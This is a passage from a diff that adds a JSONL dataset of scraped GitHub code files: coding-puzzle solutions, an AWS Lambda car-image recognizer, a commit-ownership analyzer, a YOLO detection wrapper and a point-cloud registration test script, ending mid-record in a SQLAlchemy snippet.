diff --git "a/2539.jsonl" "b/2539.jsonl" new file mode 100644--- /dev/null +++ "b/2539.jsonl" @@ -0,0 +1,648 @@ +{"seq_id":"24353414128","text":"def calculate(chess, opt):\n move_list = [[], []]\n for row in range(8):\n # chess[row] == str\n move_list[0].append(sum(1 for i in range(8) if chess[row][i] != opt[row%2][i]))\n move_list[1].append(sum(1 for i in range(8) if chess[row][i] != opt[1-row%2][i]))\n return min(map(sum, move_list))\n\ndef getNewChess(chess, i, j):\n return [line[j:j+8] for line in chess[i:i+8]]\n\nN, M = map(int, input().split())\n\nopt = [ \"\".join('W' if i % 2 == 0 else 'B' for i in range(8)),\n \"\".join('B' if i % 2 == 0 else 'W' for i in range(8))]\n\n# print(opt)\n\nchess = []\nfor linenum in range(N):\n chess.append(input())\n\nanswer = 64\nfor i in range(N-8+1):\n for j in range(M-8+1):\n newchess = getNewChess(chess, i, j)\n answer = min(answer, calculate(newchess, opt))\n\n#print(calculate(chess, opt))\nprint(answer)","repo_name":"moon0331/baekjoon_solution","sub_path":"level2/1018.py","file_name":"1018.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"13557333234","text":"from datetime import datetime, time\nimport json\nimport uuid\nimport boto3\nimport requests\nfrom botocore.exceptions import ClientError\n\ns3_client = boto3.client('s3')\ndynamodb = boto3.client('dynamodb')\n\ndef lambda_handler(event, context):\n records = event['Records']\n for record in records:\n bucket = record['s3']['bucket']['name']\n location = s3_client.get_bucket_location(Bucket=bucket)['LocationConstraint']\n key = record['s3']['object']['key']\n\n result = carnet_analyze_image(f'https://{bucket}.s3.{location}.amazonaws.com/{key}')\n\n if result is not None:\n save_to_db(result, 'carnetResponseDB')\n else:\n result = rekognition_analyze_image(bucket, key)\n save_to_db(result, 'rekogintionAnalysesDB')\n\n return {\"statusCode\": 200, \"body\": \"OK\"}\n\n\ndef carnet_analyze_image(image_url):\n response = requests.post('https://carnet.ai/recognize-url', data=image_url)\n status_code = response.status_code\n\n if status_code == 200:\n json_data = response.json()\n print(json_data)\n return json_data\n elif status_code == 429:\n print(\"Bad API response: 429. Retrying after half a second...\")\n time.sleep(0.5)\n return None\n elif status_code == 500:\n err = \"Image doesn't contain a car\"\n if response.json()['error'] == err:\n print(err)\n else:\n print(f\"Bad API response: {status_code}\")\n return None\n else:\n print(f\"Bad API response: {status_code}\")\n return None\n\n\ndef rekognition_analyze_image(bucket, key):\n client = boto3.client('rekognition')\n return client.detect_labels(\n Image={\n 'S3Object': {\n 'Bucket': bucket,\n 'Name': key\n }\n },\n MaxLabels=10,\n MinConfidence=70\n )\n\n\ndef save_to_db(data, db_name):\n current_time = datetime.now().isoformat()\n\n record = {\n 'id': {\n 'S': str(uuid.uuid4())\n },\n 'created': {\n 'S': current_time\n },\n 'updated': {\n 'S': current_time\n },\n 'data': {\n 'S': json.dumps(data)\n }\n }\n\n try:\n dynamodb.put_item(TableName=db_name, Item=record)\n except ClientError as e:\n print(e.response['Error']['Message'])\n raise e\n return\n","repo_name":"nikajordania/carnet-ai-recognition-cli","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73876294975","text":"from typing import List\n\n\nclass NumArray:\n\n def __init__(self, nums: List[int]):\n self.nums = nums\n sum = 0\n for i in range(len(nums)):\n sum += nums[i]\n nums[i] = sum\n\n def sumRange(self, left: int, right: int) -> int:\n if left == 0:\n return self.nums[right]\n else:\n return self.nums[right] - self.nums[left-1]\n\n \n\n\n# Your NumArray object will be instantiated and called as such:\n# obj = NumArray(nums)\n# param_1 = obj.sumRange(left,right)\n","repo_name":"sakshamsds/data-structures-and-algorithms","sub_path":"leetcode/easy/RangeSumQuery303.py","file_name":"RangeSumQuery303.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9999001067","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport re # biblioteca expressão regular\r\n\r\nfrom dateutil.parser import *\r\n\r\nfrom operator import itemgetter\r\n\r\nclass Commit:\r\n\r\n def str_split (self, name):\r\n name = name.split(\" - \")[0]\r\n name = name.strip()\r\n\r\n return name\r\n\r\n\r\n def conta_ownership(self, rows, dict_total, dict_conta_arquivo):\r\n \"\"\"\r\n Função utilizada para calcular o ownership do arquivo\r\n \"\"\"\r\n\r\n for r in rows:\r\n if r['qtd_variabilidades'] == \"\":\r\n continue\r\n\r\n if r['arquivo'] in dict_total:\r\n total = dict_total.get(r['arquivo'])\r\n\r\n total += 1\r\n dict_total[r['arquivo']] = total\r\n else:\r\n dict_total[r['arquivo']] = 1\r\n\r\n if (r['arquivo'], r['desenvolvedor']) in dict_conta_arquivo:\r\n conta = dict_conta_arquivo.get((r['arquivo'], r['desenvolvedor']))\r\n\r\n conta += 1\r\n dict_conta_arquivo[(r['arquivo'], r['desenvolvedor'])] = conta\r\n else:\r\n dict_conta_arquivo[(r['arquivo'], r['desenvolvedor'])] = 1\r\n\r\n for r in rows:\r\n ownership = dict_conta_arquivo.get((r['arquivo'], r['desenvolvedor']))\r\n total = dict_total.get(r['arquivo'])\r\n r['ownership'] = 100 * float(ownership) / float(total)\r\n\r\n classificacao_ownership = \"Minor\"\r\n\r\n if r['ownership'] > 5:\r\n classificacao_ownership = \"Major\"\r\n\r\n r['classificacao_ownership'] = classificacao_ownership\r\n\r\n\r\n def classificacao_tempo (self, rows, dict_total, dict_conta_arquivo):\r\n \"\"\"\r\n \r\n \"\"\"\r\n\r\n begin = end = 0\r\n rows = sorted(rows, key = itemgetter('data'))\r\n\r\n data = rows[0]['data']\r\n for r in rows:\r\n if data != r['data']:\r\n self.conta_ownership(rows[begin:end], dict_total, dict_conta_arquivo)\r\n begin = end\r\n data = r['data']\r\n end += 1\r\n else:\r\n end += 1\r\n\r\n self.conta_ownership(rows[begin:end], dict_total, dict_conta_arquivo)\r\n return rows\r\n\r\n\r\n def conta_ownership_final(self, rows, dict_total, dict_conta_arquivo):\r\n \"\"\"\r\n \"\"\"\r\n\r\n for r in rows:\r\n ownership = dict_conta_arquivo.get((r['arquivo'], r['desenvolvedor']))\r\n total = dict_total.get(r['arquivo'])\r\n ownership = 100 * float(ownership) / float(total)\r\n\r\n classificacao_ownership = \"Minor\"\r\n\r\n if ownership > 5:\r\n classificacao_ownership = \"Major\"\r\n\r\n r['ownership_final'] = ownership\r\n r['classificacao_ownership_final'] = classificacao_ownership\r\n\r\n\r\n def parse_commit(self, rows_author, json_data):\r\n rows = []\r\n crows = []\r\n\r\n for r in rows_author:\r\n commits = r[\"commits\"].split(\", \")\r\n\r\n for commit in commits:\r\n\r\n if commit == \"\":\r\n continue\r\n\r\n idCommit, commitData = commit.split(\" - \")\r\n\r\n idCommit = idCommit.strip()\r\n #commitData = re.search('\\(([^)]+)', commitData).group(1)\r\n commitData = parse(commitData.strip(), ignoretz=True)\r\n\r\n found = \"False\"\r\n variabilities = []\r\n \r\n if idCommit in json_data['Commits']:\r\n if r['arquivo'] in json_data['Commits'][idCommit]['Arquivos']:\r\n jvar = json_data['Commits'][idCommit]['Arquivos'][r['arquivo']]['Variabilidades']\r\n\r\n for var in jvar:\r\n aux = self.str_split(var)\r\n\r\n if aux == \"TRUE\":\r\n found = \"True\"\r\n else:\r\n variabilities.append(aux)\r\n\r\n var = \"\"\r\n if len(variabilities) != 0:\r\n var = variabilities[0]\r\n\r\n crows.append({\r\n \"commit\": idCommit,\r\n \"data\": commitData.strftime(\"%Y-%m-01\"),\r\n \"desenvolvedor\": r[\"desenvolvedor\"], \r\n \"arquivo\": r[\"arquivo\"],\r\n \"qtd_variabilidades\": len(variabilities), \r\n \"existencia\": found, \r\n \"variabilidades\": var,\r\n \"classificacao\": \"\", \r\n \"ehautor\": r[\"autor\"],\r\n \"ownership\": 0,\r\n \"classificacao_ownership\": \"\",\r\n \"ownership_final\": 0,\r\n \"classificacao_ownership_final\": \"\"\r\n })\r\n\r\n if len(variabilities) > 0:\r\n for i in range(1, len(variabilities)):\r\n crows.append({\r\n \"commit\": idCommit,\r\n \"data\": commitData.strftime(\"%Y-%m-01\"),\r\n \"desenvolvedor\": r[\"desenvolvedor\"], \r\n \"arquivo\": r[\"arquivo\"],\r\n \"qtd_variabilidades\": \"\",\r\n \"existencia\": \"\", \r\n \"variabilidades\": variabilities[i],\r\n \"classificacao\": \"\", \r\n \"ehautor\": r[\"autor\"],\r\n \"ownership\": 0,\r\n \"classificacao_ownership\": \"\",\r\n \"ownership_final\": 0,\r\n \"classificacao_ownership_final\": \"\"\r\n })\r\n \r\n rows = sorted(crows, key = itemgetter('commit'))\r\n\r\n idx = 0\r\n gen = 0\r\n esp = 0\r\n idCommit = \"\"\r\n for i, r in enumerate(rows):\r\n\r\n if idCommit != r[\"commit\"]:\r\n \r\n if gen > 0:\r\n if esp > 0:\r\n classificacao = \"Misto\"\r\n else:\r\n classificacao = \"Generalista\"\r\n else:\r\n classificacao = \"Especialista\"\r\n\r\n for j in range(idx, i):\r\n rows[j][\"classificacao\"] = classificacao\r\n\r\n idx = i\r\n gen = 0\r\n esp = 0\r\n idCommit = r[\"commit\"]\r\n\r\n if len(r[\"variabilidades\"]) > 0:\r\n esp += 1\r\n\r\n if r[\"existencia\"] == \"True\":\r\n gen += 1\r\n\r\n if gen > 0:\r\n if esp > 0:\r\n classificacao = \"Misto\"\r\n else:\r\n classificacao = \"Generalista\"\r\n else:\r\n classificacao = \"Especialista\"\r\n\r\n for j in range(idx, len(rows)):\r\n rows[j][\"classificacao\"] = classificacao\r\n\r\n rows = sorted(crows, key = itemgetter('data'))\r\n dict_nome = dict()\r\n \r\n for i, r in enumerate(rows):\r\n if r['desenvolvedor'] in dict_nome:\r\n if dict_nome[r['desenvolvedor']] != r['classificacao']:\r\n dict_nome[r['desenvolvedor']] = \"Misto\"\r\n \r\n dev = r['desenvolvedor']\r\n data = r['data']\r\n for j in range(i, 0, -1):\r\n if rows[j]['desenvolvedor'] == dev:\r\n if rows[j]['data'] != data:\r\n break\r\n \r\n rows[j]['classificacao'] = \"Misto\"\r\n else:\r\n dict_nome[r['desenvolvedor']] = r['classificacao']\r\n\r\n dict_total = dict()\r\n dict_conta_arquivo = dict()\r\n self.classificacao_tempo(rows, dict_total, dict_conta_arquivo)\r\n self.conta_ownership_final(rows, dict_total, dict_conta_arquivo)\r\n\r\n return rows\r\n","repo_name":"karol-milano/SistemasConfiguraveis","sub_path":"doa/python/commit.py","file_name":"commit.py","file_ext":"py","file_size_in_byte":8247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2991392451","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 6 17:24:16 2018\n\n@author: zouco\n\"\"\"\n\nfrom darkflow.net.build import TFNet\nimport cv2\nimport os\n# from pprint import pprint\nimport json\nimport matplotlib.pyplot as plt\nimport random\n\n\n\n\nclass YoloCV():\n \n def __init__(self, options = {\"model\": \"cfg/yolo.cfg\", \"load\": \"bin/yolov2.weights\", \"threshold\": 0.7, \"gpu\": 0.8}):\n \n if isinstance(options, str):\n with open(options,'r',encoding = 'utf-8') as f:\n options = json.load(f)\n \n wrk_dir = os.getcwd()\n os.chdir('C:\\\\Users\\\\zouco\\\\Desktop\\\\\\pyProject\\\\darkflow-master')\n self.tfnet_ = TFNet(options)\n os.chdir(wrk_dir)\n \n\n def run(self, pic_path, output_path):\n self.get_output(pic_path, output_path)\n plt.imshow(self.img_output_)\n # pprint(self.result_)\n print(self.result_summary_)\n \n \n def get_output(self, pic_path, output_path):\n self.get_result(pic_path)\n self.img_output_ = YoloCV.process_results(self.img_, self.result_)\n self.save_output(output_path)\n \n \n def get_result(self, pic_path):\n \n '''\n results is like a list of dictionary:\n {'bottomright': {x: .. , y: ..}, 'label': xx, 'confidence': xx , ...}\n \n '''\n \n \n self.img_ = cv2.cvtColor(cv2.imread(pic_path), cv2.COLOR_BGR2RGB)\n self.result_ = self.tfnet_.return_predict(self.img_)\n \n @staticmethod\n def process_results(img, results):\n # add rectangles with text \n \n items = set([item['label'] for item in results])\n \n color_dict = {}\n for item in items:\n color_dict.update({item: (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))})\n \n for result in results:\n label = result['label']\n color = color_dict[label]\n img = YoloCV.draw_rec(img, result, color)\n \n return img\n \n @staticmethod\n def draw_rec(img, result, color):\n # add one rectangle by result\n \n tl = (result['topleft']['x'], result['topleft']['y'])\n br = (result['bottomright']['x'], result['bottomright']['y'])\n label = result['label']\n \n lwd = 5\n img = cv2.rectangle(img, tl, br, color, lwd)\n img = cv2.putText(img, label, (tl[0], tl[1]-10), cv2.FONT_HERSHEY_COMPLEX, 1, color, lwd) \n return img\n \n\n \n def save_output(self, output_path):\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n plt.imsave(os.path.join(output_path, 'output.png'), self.img_output_)\n \n @property\n def result_summary_(self):\n items = [item['label'] for item in self.result_]\n summary_dict = {}\n for item in items:\n try:\n summary_dict[item] += 1\n except KeyError:\n summary_dict.update({item: 1})\n return summary_dict\n \n\nif __name__== \"__main__\":\n wrk_dir = os.getcwd()\n #config InlineBackend.figure_format = 'svg'\n #os.chdir('C:\\\\Users\\\\zouco\\\\Desktop\\\\\\pyProject\\\\darkflow-master')\n \n options = {\n \"model\": \"cfg/yolo.cfg\", \n \"load\": \"bin/yolov2.weights\", \n \"threshold\": 0.3,\n \"gpu\": 0.8}\n \n pic_path = \"C:\\\\Users\\\\zouco\\\\Desktop\\\\\\pyProject\\\\PicVideoForCV\\\\sample_office.jpg\"\n output_path = 'output'\n \n yc = YoloCV(options)\n yc.run(pic_path, output_path)\n \n \n \n \n","repo_name":"Apollo1840/ComputerVisionTools","sub_path":"Yolo/on_picture.py","file_name":"on_picture.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"9915070543","text":"import sys\nsys.stdin = open('C:/Users/dhxog/Desktop/파이썬 알고리즘 문제풀이(코딩테스트 대비)/섹션 4/8. 침몰하는 타이타닉/in2.txt', 'rt')\n\nn, m = map(int, input().split())\n\na = list(map(int, input().split()))\n\na\n\nfrom collections import deque\n\na.sort()\n\na = deque(a)\n\na\n\ncnt = 0\n\nwhile a:\n if len(a)==1:\n cnt+=1\n break\n if a[0]+a[-1]>m:\n a.pop()\n cnt+=1\n else:\n a.popleft()\n a.pop()\n cnt+=1\nprint(cnt)","repo_name":"dhxoghks95/Python_Algorithm","sub_path":"section_4/Q8/4_8oth.py","file_name":"4_8oth.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41091941819","text":"import torch\nimport os\nimport sys\nimport argparse\nimport importlib\nimport shutil\nimport numpy as np\nimport datetime\nimport logging\nfrom utils import distance_metric\nfrom pathlib import Path\nfrom utils.modelnet_data_loading import ModelNet40_h5_dataset_list\nfrom utils.sample_strategies import fps_sampling, random_sampling, index_points\nfrom tqdm import tqdm\nfrom utils.neighbor_search import query_knn_point\nimport math\nfrom utils.large_modelnet_data_loading import ModelNetDataLoader\nfrom utils.loss_functions import TaskLoss_regis\nfrom utils.regis_utils.qdataset import QuaternionFixedDataset\nfrom data.regis_modelnet_data_loading import ModelNetCls\nimport torchvision\nfrom utils.regis_utils.pctransforms import OnUnitCube, PointcloudToTensor\nfrom torch.utils.data import DataLoader\nfrom utils.visualization import visu_pc_w_dis, savetxt_pc_w_dis\n\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = BASE_DIR\nsys.path.append(os.path.join(ROOT_DIR, 'models'))\ncur_device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='OR-PD-train')\n parser.add_argument('--task_model', type=str, default='pcrnet')\n parser.add_argument('--sample_model', type=str, default='ASPD_dgcnn')\n parser.add_argument('--progressive_version', type=bool, default=True)\n parser.add_argument('--coarse_log_dir', type=str, default=None, help='other pretrained model')\n parser.add_argument('--log_dir', type=str, default='sampler_regis')\n parser.add_argument('--task_log_dir', type=str, default='pcrnet', help='full_acc=87.3%')\n parser.add_argument('--batch_size', type=int, default=2)\n parser.add_argument('--start_epoch', default=None)\n parser.add_argument('--n_point', type=int, default=1024)\n parser.add_argument('--n_sample', type=int, default=16)\n parser.add_argument('--visu', type=bool, default=True)\n\n parser.add_argument('--gpu', type=str, default='0', help='specify GPU devices')\n parser.add_argument('--data_dir', type=str, default='modelnet40_ply_hdf5_2048')\n\n parser.add_argument('--random_seed', type=int, default=0, help='int or None')\n\n parser.add_argument('--use_fps', type=bool, default=True)\n\n parser.add_argument('--pre_sample', type=str, default='rs')\n\n parser.add_argument('--alpha', type=float, default=10)\n parser.add_argument('--beta', type=float, default=1)\n parser.add_argument('--w_sigma', type=float, default=0.1, help='weights for sigma')\n\n parser.add_argument('--S_beta', type=float, default=0, help='beta in Simplify loss')\n parser.add_argument('--S_gamma', type=float, default=1)\n parser.add_argument('--S_delta', type=float, default=0)\n\n parser.add_argument('--lmbda', type=float, default=100, help='weight for task loss')\n\n parser.add_argument('--min_sigma', type=float, default=1e-4)\n parser.add_argument('--initial_temp', type=float, default=0.1)\n\n parser.add_argument('--partial_train', type=bool, default=False)\n\n parser.add_argument('--restore_last', type=bool, default=False)\n\n parser.add_argument('--uni_train', type=bool, default=False)\n\n parser.add_argument('--use_uniform_sample', type=bool, default=False)\n\n parser.add_argument('--use_large_dataset', type=bool, default=False)\n\n parser.add_argument('--process_data', type=bool, default=True)\n\n parser.add_argument('--check_repeat', type=bool, default=True)\n\n parser.add_argument('--use_atten', type=bool, default=True)\n\n parser.add_argument('--use_match', type=bool, default=True)\n\n parser.add_argument('--skip_projection', type=bool, default=True)\n\n parser.add_argument('--specific_mode', type=bool, default=False, help='extract knn feature for attention module from knn neighbors')\n\n parser.add_argument('--dense_eval', type=bool, default=False)\n\n\n ##### register related #####\n parser.add_argument('--exp_name', type=str, default='log/pcr_net/car_ipcrnet', metavar='N',\n help='Name of the experiment')\n parser.add_argument('--dataset_path', type=str, default='ModelNet40',\n metavar='PATH', help='path to the input dataset') # like '/path/to/ModelNet40'\n parser.add_argument('--eval', type=bool, default=False, help='Train or Evaluate the network.')\n\n # settings for input data\n parser.add_argument('--dataset_type', default='modelnet', choices=['modelnet', 'shapenet2'],\n metavar='DATASET', help='dataset type (default: modelnet)')\n parser.add_argument('--num_points', default=1024, type=int,\n metavar='N', help='points in point-cloud (default: 1024)')\n\n # settings for PointNet\n parser.add_argument('--emb_dims', default=1024, type=int,\n metavar='K', help='dim. of the feature vector (default: 1024)')\n parser.add_argument('--symfn', default='max', choices=['max', 'avg'],\n help='symmetric function (default: max)')\n\n # settings for on training\n parser.add_argument('-j', '--workers', default=4, type=int,\n metavar='N', help='number of data loading workers (default: 4)')\n parser.add_argument('--pretrained', default='log/pcr_net/car_ipcrnet/checkpoints/best_model.t7', type=str,\n metavar='PATH', help='path to pretrained model file (default: null (no-use))')\n parser.add_argument('--device', default='cuda:0', type=str,\n metavar='DEVICE', help='use CUDA if available')\n\n parser.add_argument('--seed', type=int, default=4321)\n\n parser.add_argument('--datafolder', type=str, default='car_hdf5_2048')\n\n return parser.parse_args()\nFLAGS = parse_args()\n\n\ndef creat_dir(args):\n timestr = str(datetime.datetime.now().strftime('%Y-%m-%d_%H-%M'))\n exp_dir = Path('./log/')\n exp_dir.mkdir(exist_ok=True)\n\n task_log_dir = Path(args.exp_name)\n task_checkpoints_dir = task_log_dir.joinpath('checkpoints/')\n\n exp_dir = exp_dir.joinpath(args.sample_model)\n exp_dir.mkdir(exist_ok=True)\n\n if args.coarse_log_dir is not None:\n coarse_checkpoints_dir = exp_dir.joinpath(args.coarse_log_dir)\n coarse_checkpoints_dir = coarse_checkpoints_dir.joinpath('checkpoints/')\n else:\n coarse_checkpoints_dir = None\n\n if args.log_dir is None:\n exp_dir = exp_dir.joinpath(timestr)\n else:\n exp_dir = exp_dir.joinpath(args.log_dir)\n exp_dir.mkdir(exist_ok=True)\n checkpoints_dir = exp_dir.joinpath('checkpoints/')\n checkpoints_dir.mkdir(exist_ok=True)\n log_dir = exp_dir.joinpath('logs/')\n log_dir.mkdir(exist_ok=True)\n return log_dir, checkpoints_dir, task_checkpoints_dir, coarse_checkpoints_dir\n\n\ndef data_loading(args):\n '''data loading'''\n train_dataset_list = ModelNet40_h5_dataset_list(dataset_name=args.data_dir, split='train', n_point=args.n_point)\n test_dataset_list = ModelNet40_h5_dataset_list(dataset_name=args.data_dir, split='test', n_point=args.n_point)\n num_train_data = 0\n num_test_data = 0\n for loader_id in range(len(train_dataset_list)):\n num_train_data += len(train_dataset_list[loader_id])\n for loader_id in range(len(test_dataset_list)):\n num_test_data += len(test_dataset_list[loader_id])\n print('num of train_data: %d' % num_train_data)\n print('num of test_data: %d' % num_test_data)\n return train_dataset_list, test_dataset_list\n\n\ndef sample_idx_check(idx):\n cnt = 0\n for b in range(idx.shape[0]):\n elements, counts = torch.unique(idx[b], return_counts=True)\n cnt += sum(counts != 1)\n\n return cnt.cpu().data.numpy()\n\n\ndef log(args, log_dir):\n '''log'''\n logger = logging.getLogger(\"Model\")\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n file_handler = logging.FileHandler('%s/%s.txt' % (log_dir, args.log_dir))\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n return logger\n\n\ndef load_checkpoints(model, checkpoints_dir, source_checkpoints_dir=None):\n try:\n if args.restore_last:\n checkpoint = torch.load(str(checkpoints_dir) + '/last_model.pth', map_location=torch.device(cur_device))\n else:\n checkpoint = torch.load(str(checkpoints_dir) + '/best_model.pth', map_location=torch.device(cur_device))\n start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['model_state_dict'])\n print('Use pre-trained models')\n except:\n if source_checkpoints_dir is not None:\n checkpoint = torch.load(str(source_checkpoints_dir) + '/best_model.pth',\n map_location=torch.device(cur_device))\n model_state_dict = checkpoint['model_state_dict']\n cur_state_dict = model.state_dict()\n cur_state_dict.update(model_state_dict)\n model.load_state_dict(cur_state_dict)\n # model.load_state_dict(checkpoint['model_state_dict'])\n print('No existing models, starting training from source checkpoints...')\n else:\n print('No existing models, starting training from scratch...')\n # model = model.apply(weights_init)\n start_epoch = 0\n return model, start_epoch\n\n\ndef main(args):\n def log_string(string):\n logger.info(string)\n print(string)\n\n '''log'''\n log_dir, checkpoints_dir, task_checkpoints_dir, source_checkpoints_dir = creat_dir(args)\n logger = log(args, log_dir)\n log_string('PARAMETER ...')\n log_string(args)\n\n shutil.copy('models/%s.py' % args.sample_model, str(log_dir))\n shutil.copy(str(os.path.abspath(__file__)), str(log_dir))\n\n '''data'''\n # '''data'''\n transforms = torchvision.transforms.Compose([PointcloudToTensor(), OnUnitCube()])\n\n traindata = ModelNetCls(\n args.num_points,\n transforms=transforms,\n train=True,\n download=False,\n folder=args.datafolder,\n )\n testdata = ModelNetCls(\n args.num_points,\n transforms=transforms,\n train=False,\n download=False,\n folder=args.datafolder,\n )\n\n train_repeats = max(int(5000 / len(traindata)), 1)\n\n trainset = QuaternionFixedDataset(traindata, repeat=train_repeats, seed=0, )\n testset = QuaternionFixedDataset(testdata, repeat=1, seed=0)\n\n '''create model'''\n MODEL = importlib.import_module(args.sample_model)\n if args.sample_model=='SNET' or args.sample_model=='SampleNet':\n sampler = MODEL.get_model(num_out_points=args.n_point).to(cur_device)\n else:\n sampler = MODEL.get_model(use_atten=args.use_atten, pre_sample=args.pre_sample).to(cur_device)\n\n TASK_MODEL = importlib.import_module(args.task_model)\n task_model = TASK_MODEL.iPCRNet().to(cur_device)\n task_model.requires_grad_(False)\n task_model.eval()\n task_checkpoints = torch.load(str(task_checkpoints_dir) + '/best_model.t7', map_location=torch.device(cur_device))\n task_model.load_state_dict(task_checkpoints)\n\n task_model.sampler = sampler\n\n task_model, start_epoch = load_checkpoints(task_model, checkpoints_dir, source_checkpoints_dir)\n\n sample_criterion = MODEL.get_sample_loss(alpha=args.alpha, beta=args.beta, S_beta=args.S_beta, S_gamma=args.S_gamma, S_delta=args.S_delta).to(cur_device)\n task_criterion = TaskLoss_regis().to(cur_device)\n\n if args.dense_eval:\n # n_sample_list = np.array([16,32,64,128,256,512])\n n_sample_list = 2 ** np.linspace(4, 10, 50)\n n_sample_list = n_sample_list.astype('int')\n else:\n n_sample_list = [args.n_sample]\n\n with torch.no_grad():\n task_model.sampler.eval()\n NRE_list = []\n RSR_list = []\n HD_list = []\n for n_sample in n_sample_list:\n mean_RE = []\n mean_HD = []\n repeat_sample_cnt = []\n test_loader = DataLoader(testset, batch_size=args.batch_size, shuffle=False, drop_last=False,\n num_workers=args.workers)\n for batch_id, (data) in tqdm(enumerate(test_loader), total=len(test_loader)):\n template, source, igt = data\n template, source = template.to(cur_device).float(), source.to(cur_device).float()\n\n if args.use_fps:\n if args.pre_sample == 'fps':\n pred_subset_t = fps_sampling(template, n_sample)[0]\n pred_subset_s = fps_sampling(source, n_sample)[0]\n else:\n pred_subset_t = random_sampling(template, n_sample)[0]\n pred_subset_s = random_sampling(source, n_sample)[0]\n else:\n pred_subset_t, _ = task_model.sampler(template.transpose(2,1), n_sample)\n pred_subset_s, _ = task_model.sampler(source.transpose(2,1), n_sample)\n\n if args.sample_model == 'SNET' or args.sample_model == 'SampleNet':\n if args.progressive_version:\n pred_subset_t = pred_subset_t[:, :n_sample, :]\n pred_subset_s = pred_subset_s[:, :n_sample, :]\n\n\n if args.use_match:\n idx_t = query_knn_point(nsample=1, xyz=template, new_xyz=pred_subset_t)\n idx_s = query_knn_point(nsample=1, xyz=source, new_xyz=pred_subset_s)\n pred_subset_t = index_points(template, idx_t.squeeze())\n pred_subset_s = index_points(source, idx_s.squeeze())\n\n if args.check_repeat:\n cnt_t = sample_idx_check(idx_t)\n cnt_s = sample_idx_check(idx_s)\n cnt = 0.5 * (cnt_t + cnt_s)\n else:\n cnt = 0\n repeat_sample_cnt.append(cnt/template.shape[0])\n\n hd_t = distance_metric.hausdorff_dist(pred_subset_t, template)\n hd_s = distance_metric.hausdorff_dist(pred_subset_s, source)\n hd = 0.5 * (hd_t + hd_s)\n mean_HD.append(hd.item())\n\n samp_data = (pred_subset_t, pred_subset_s, igt)\n\n # if args.sample_model == 'SNET':\n # if args.progressive_version:\n # subset_t = pred_subset_t[:, :n_sample, :]\n # subset_s = pred_subset_s[:, :n_sample, :]\n # samp_data = (subset_t, subset_s, igt)\n\n _, pcrnet_loss_info = task_criterion(samp_data, task_model)\n rot_err = pcrnet_loss_info['rot_err']\n\n mean_RE.append(rot_err.cpu().data.numpy())\n\n if args.visu and batch_id in [2,21]:\n print(f'batch {batch_id}, rot err: {rot_err}')\n est_transform = pcrnet_loss_info['est_transform']\n transform_source = est_transform.rotate(template)\n transform_source_np = transform_source.cpu().data.numpy()\n template_np = template.cpu().data.numpy()\n source_np = source.cpu().data.numpy()\n pred_subset_t_np = pred_subset_t.cpu().data.numpy()\n pred_subset_s_np = pred_subset_s.cpu().data.numpy()\n for b in range(pred_subset_t.shape[0]):\n template_np_b = template_np[b]\n source_np_b = source_np[b]\n transform_source_np_b = transform_source_np[b]\n pred_subset_s_np_b = pred_subset_s_np[b]\n pred_subset_t_np_b = pred_subset_t_np[b]\n sampler_name = 'RS'\n dir_name = sampler_name + '_regis_' + str(args.n_sample)\n savetxt_pc_w_dis(template_np_b, dirname=dir_name, filename=sampler_name+'_batch'+str(batch_id)+'ins'+str(b)+'_template')\n savetxt_pc_w_dis(source_np_b, dirname=dir_name, filename=sampler_name+'_batch'+str(batch_id)+'ins'+str(b)+'_source')\n savetxt_pc_w_dis(transform_source_np_b, dirname=dir_name, filename=sampler_name+'_batch'+str(batch_id)+'ins'+str(b)+'_tran_source')\n savetxt_pc_w_dis(pred_subset_t_np_b, dirname=dir_name, filename=sampler_name+'_batch'+str(batch_id)+'ins'+str(b)+'_subset_t')\n savetxt_pc_w_dis(pred_subset_s_np_b, dirname=dir_name, filename=sampler_name+'_batch'+str(batch_id)+'ins'+str(b)+'_subset_s')\n\n\n\n\n test_mean_re = np.mean(mean_RE)\n test_mean_hd = np.mean(mean_HD)\n repeat_sample_rate = np.mean(repeat_sample_cnt) / n_sample\n log_string('test rot err (%d points) %.5f, repeat sample rate %.5f' % (n_sample, test_mean_re, repeat_sample_rate))\n NRE_list.append(test_mean_re)\n RSR_list.append(repeat_sample_rate)\n HD_list.append(test_mean_hd)\n\n result = np.concatenate([n_sample_list.reshape(-1,1), np.array(NRE_list).reshape(-1,1),\n np.array(HD_list).reshape(-1,1)], 1)\n # np.save('result/new/regis_RS.npy', result)\n\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n exit()\n\n n_sample_list = [16, 64, 256]\n log_dir_list = ['base_16', 'base_64', 'base_256']\n\n\n for i in range(len(n_sample_list)):\n args.n_sample = n_sample_list[i]\n args.log_dir = log_dir_list[i]\n main(args)","repo_name":"HHHTTY/AS-PD","sub_path":"log/ASPD_dgcnn/sampler_regis/logs/test_sampler_regis.py","file_name":"test_sampler_regis.py","file_ext":"py","file_size_in_byte":17526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"73976683456","text":"from sqlalchemy import create_engine\n\n\ndef make_engine(uri, 